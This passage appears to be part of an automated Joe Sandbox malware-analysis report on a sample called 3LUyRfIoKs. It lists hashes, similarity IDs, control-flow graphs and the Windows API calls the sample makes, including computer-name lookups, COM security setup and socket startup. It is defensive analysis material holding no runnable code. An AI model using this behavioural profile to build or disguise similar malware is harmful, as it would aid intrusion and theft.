                                                                                                                                                                                                                                                • Opcode ID: 3ef713432d351eb6be88789cc536e71dd97f0185de03404efe0641fd421f8b7d
                                                                                                                                                                                                                                                • Instruction ID: 17ccf2a4d2a53eb98b48341274768b9c3c441ca93ea9487448a0470b65e50262
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ef713432d351eb6be88789cc536e71dd97f0185de03404efe0641fd421f8b7d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99B17732B083904BC728CE69DCE16BBB7A2EBC5314F1DC63CD9865B385CA759C458781
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: D723E1129B685441BEBA0C6A975F1733
                                                                                                                                                                                                                                                • API String ID: 0-4137089617
                                                                                                                                                                                                                                                • Opcode ID: b6fd817d0db9f6a84c865f8b4154423fe2d5ce12d66927e698549f1f03004add
                                                                                                                                                                                                                                                • Instruction ID: fcd0b59b3c1661c63bd0bcb60ac30d28004c08f677fc0674fce7ab80db1f7d07
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6fd817d0db9f6a84c865f8b4154423fe2d5ce12d66927e698549f1f03004add
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 908129756407418BD325CB38CD926A7B7E2FF9B315F19CA6CC4865B383E739A8028750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(00AE148A,?,00000018,?,?,00000018,?,?,?), ref: 00ADE13E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                                                                                                • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                • Opcode ID: dc4c9a4cede90193039f3836874e890e17c3a841bb6f5194293cc75cc6666d5a
                                                                                                                                                                                                                                                • Instruction ID: d4bfd86356a78c5c3d5b2119f71bddca41de9919d5eff43aee1e9a860728d08d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc4c9a4cede90193039f3836874e890e17c3a841bb6f5194293cc75cc6666d5a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E77119B5A083005BDB289B68DCD2F7F76E1DF92314F1A853CE4868B292E274DC058B56
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: =<32
                                                                                                                                                                                                                                                • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                                • Opcode ID: 455dad8c37ae2cdc1af5dcfe6ab487bec2669b3589ff987dc1a11bde1d364a01
                                                                                                                                                                                                                                                • Instruction ID: 78f82a83d013dbca52f53540f13e8dcfe957f60ea280f3cc2593610870163ec2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 455dad8c37ae2cdc1af5dcfe6ab487bec2669b3589ff987dc1a11bde1d364a01
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24314638708394ABE714DB55DCE1B3FB7A6EB95750F18852CF6859B2A0D770EC408B82
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ,-
                                                                                                                                                                                                                                                • API String ID: 0-1027024164
                                                                                                                                                                                                                                                • Opcode ID: 06cf73e96cbd3b5690f2ca20f4169135739bb2cbdda87b2e837e8d4cd73f2704
                                                                                                                                                                                                                                                • Instruction ID: 0ed83c1ee5481d759adb021225f0da9b9db28ae178e02a48062e4885e0ce7910
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06cf73e96cbd3b5690f2ca20f4169135739bb2cbdda87b2e837e8d4cd73f2704
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC21D6A1A153008BC7149F29CD92A27B6B1EF833A5F46861CE4968B392F774CD05C792
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                • Opcode ID: 11df37a858b7e14e7ffe233c2ec2c75207786d38d896addf74f7f351ad0cd8a9
                                                                                                                                                                                                                                                • Instruction ID: 6695fd0f4aa9336d6c77f3899f7fb55c625fb519870f35184d068c8a0a0a55f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11df37a858b7e14e7ffe233c2ec2c75207786d38d896addf74f7f351ad0cd8a9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F73122716083448BC314DF58D8D2A7FBBF4EBC5324F14892CE69987290D375D888CB92
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 510f01596c43d2e7655e5b0aaffec9a824681100a653a446aaa54e68c6868710
                                                                                                                                                                                                                                                • Instruction ID: 21385c57cd0e54895a7fe4c9402b07c2bd63af18c80c2b4bf35c1af23364b760
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510f01596c43d2e7655e5b0aaffec9a824681100a653a446aaa54e68c6868710
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E26148356043819BDB15EF19C890A3FB7A2EBD5720F19C52CE9858B291EBB0DC91C792
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 296dbb6428501d780592384a61487a22eea929e946bd07eeb433fb78fb1b9264
                                                                                                                                                                                                                                                • Instruction ID: fb09b249e860f0e9ab899ab314ab5578421b37d4f2ea5ca27cb865284a998490
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 296dbb6428501d780592384a61487a22eea929e946bd07eeb433fb78fb1b9264
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84516C75A083064FD728EF68C89062FB7D2ABD5720F59897EE4C69B391E6319C01CB85
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 237503144-0
                                                                                                                                                                                                                                                • Opcode ID: 99e572c0408956fda82816b602a9a0cf9c30361984c88d2f14bc81f3be16e671
                                                                                                                                                                                                                                                • Instruction ID: 06cd75ff173aa229dce77537e7152f167601ecfc3f3d8fedc8f54f9933a461ab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99e572c0408956fda82816b602a9a0cf9c30361984c88d2f14bc81f3be16e671
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E310AEAF002441BE90576212E63F7F61674BD6718F09102CF40B2B3C3EE69F95696A7

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 1309 acd7ee-acd7f3 1310 acd7f5-acd7f9 1309->1310 1311 acd813-acd819 1309->1311 1312 acd800-acd809 1310->1312 1313 acd896-acdbfb FreeLibrary call adfe00 1311->1313 1312->1312 1314 acd80b-acd80e 1312->1314 1318 acdc00-acdc12 1313->1318 1314->1313 1318->1318 1319 acdc14-acdc19 1318->1319 1320 acdc2d 1319->1320 1321 acdc1b-acdc1f 1319->1321 1323 acdc30-acdc72 GetComputerNameExA 1320->1323 1322 acdc20-acdc29 1321->1322 1322->1322 1324 acdc2b 1322->1324 1324->1323
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00ACD898
                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00ACDC43
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                • String ID: ;87>
                                                                                                                                                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                                • Opcode ID: e9531dacc6dc5ee6e652ade64745936db70065d4eb87f6fa92b73e8a478c4a2b
                                                                                                                                                                                                                                                • Instruction ID: c55cfdc29abc90549402003ba57e13ad23b31e61ddcff699c00fcdb825db99be
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9531dacc6dc5ee6e652ade64745936db70065d4eb87f6fa92b73e8a478c4a2b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE2125701047828FDB228F38C890B26BFE1EF57300F1986ADC4D68B396DB349842DB61

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 1325 acd893-acdbfb FreeLibrary call adfe00 1330 acdc00-acdc12 1325->1330 1330->1330 1331 acdc14-acdc19 1330->1331 1332 acdc2d 1331->1332 1333 acdc1b-acdc1f 1331->1333 1335 acdc30-acdc72 GetComputerNameExA 1332->1335 1334 acdc20-acdc29 1333->1334 1334->1334 1336 acdc2b 1334->1336 1336->1335
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00ACD898
                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00ACDC43
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                • String ID: ;87>
                                                                                                                                                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                                • Opcode ID: 7c05d3527678a36208b81e3921513fc457904dca2db0a3d80e0d0208857c7cb5
                                                                                                                                                                                                                                                • Instruction ID: eb46b782648a688f020296074f57bddaa322a958a1d012b9c9643412ef1f6e23
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c05d3527678a36208b81e3921513fc457904dca2db0a3d80e0d0208857c7cb5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3811C4B11056428FD7118F34DC50B6BBBE2EF9B311F1AC6A8D4968B292DA349842DB50
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 00AA9D98
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 00AA9E78
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 44a62f7da8b5cd8f58770a76da71fa02244359b2deab32f7e88358ee38b99b90
                                                                                                                                                                                                                                                • Instruction ID: 7a439e8cb60200fdad9ce3ec5f8602b4b0eca913d474cbfd67e0349b3cc213f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44a62f7da8b5cd8f58770a76da71fa02244359b2deab32f7e88358ee38b99b90
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1411274D003409FE7159F7899D2A9A7F71EB06324F51829CD5A02F3E6C731940ACBE2
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 00AAF09C
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                • Opcode ID: b58e6e74f33d7de81737e9668790be66ccf924deba8d0ab5e26be1b3bc9943cb
                                                                                                                                                                                                                                                • Instruction ID: 2d33b6920e3efbf262dca48e39afb9cf8420e0aec0314133e5f43844756dc6ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b58e6e74f33d7de81737e9668790be66ccf924deba8d0ab5e26be1b3bc9943cb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E41C9B4C10B40AFD370EF39994B7137EB4AB05250F504B1DF9E6866D4E631A4198BD7
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00ACDD03
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                                                                                                • Opcode ID: e2a3065ada8e8b10ffe1c0a47e0b6595f0a3982c157be99bca73d2a3b28e5a8e
                                                                                                                                                                                                                                                • Instruction ID: 9e8be76cb071b45509991fe4384368e8854c644bd6350ce29f0f7679dfa09a05
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2a3065ada8e8b10ffe1c0a47e0b6595f0a3982c157be99bca73d2a3b28e5a8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA21A4705087918FD7268B34C4A0B32BBE1BF5B304F1995DDD4D78B786CA78A445C761
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00ACDD03
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                                                                                                • Opcode ID: f3499dd09175a5eb5ed408f2c542c70bf78660350b36dab79e41ec349bf8a4cc
                                                                                                                                                                                                                                                • Instruction ID: 84fa238cf61d26aa3b9c0479c8a6477b8d7fd4f0dceac71042e3822f8575a545
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3499dd09175a5eb5ed408f2c542c70bf78660350b36dab79e41ec349bf8a4cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11C4B06047918BD7258B34C860722BBA2BF4A304B1DC69DD496CB782CA38D441C761
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00ADE0E0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: 5a8188bc36d4c3f314caa068babfd50b5c995ec3c52986095f265e212a5fc8b6
                                                                                                                                                                                                                                                • Instruction ID: 8aed3fbb387f3dc1d6c3365c287bb29a611b62a48e27b24295cc661ed064bd01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a8188bc36d4c3f314caa068babfd50b5c995ec3c52986095f265e212a5fc8b6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF0A072858262EBD310AF78BE05A5B3AB4EFC2720F050436F4029A260DA34E816C691
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00AAECA2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                                                                                                                • Opcode ID: 96d2b20a6a40f55d6a5382012ce95a74931305990b8a0a96dd383b9b9ec3ce1a
                                                                                                                                                                                                                                                • Instruction ID: 8f75c7ece1926dbd0a81cf4beffa6dcbb69a76f5fbb06360cbe3073bc56377b2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96d2b20a6a40f55d6a5382012ce95a74931305990b8a0a96dd383b9b9ec3ce1a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5E092347DA3827AF6798665ECA3F2931169B42F29F306305B3253E3D4DAD03102820D
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                                • Opcode ID: 2a601db17fc624b84a423c544d846958c34239d1c4a8c7f488310603ac770014
                                                                                                                                                                                                                                                • Instruction ID: 5be0e8111f0c00fdb85e83b94af852a7076bd399b76ed476e48dbefd2429fe1c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a601db17fc624b84a423c544d846958c34239d1c4a8c7f488310603ac770014
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20F0D0B4109701CFD344DF24D5A471A7BF0FB88304F10884CE4969B390CB759A49CF82
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                                • Opcode ID: d7ca138dd5451e7a98976222f4d081c4cf2b19126629374553b581e7ab93c3d8
                                                                                                                                                                                                                                                • Instruction ID: d60f1ef37ca34d66b909993c20c4072a91fd2b9faded893690ac02bf14ed2c10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7ca138dd5451e7a98976222f4d081c4cf2b19126629374553b581e7ab93c3d8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF07A745083418FD314DF64C5E871BBBE0BB84308F00891DE5998B390C7B59549CF82
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 00AA9ED2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Startup
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                                                                                                • Opcode ID: 8966e7395e23f2e442868baa73dbbc3c925e19826c049055b67a02a605d959fd
                                                                                                                                                                                                                                                • Instruction ID: 8eba3c75cc33697362b0d57ffa9ad3aaca96a251e22f92fed1ba0a6fe6624fb7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8966e7395e23f2e442868baa73dbbc3c925e19826c049055b67a02a605d959fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55E02B33A406439BD700DBB4FC97E8A3356DB15345705C429E216DD171EA72A4119B10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,00ADE0F9), ref: 00ADC590
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 00ADC561
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 00AFA0B7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00AC43AA
                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00AC443E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
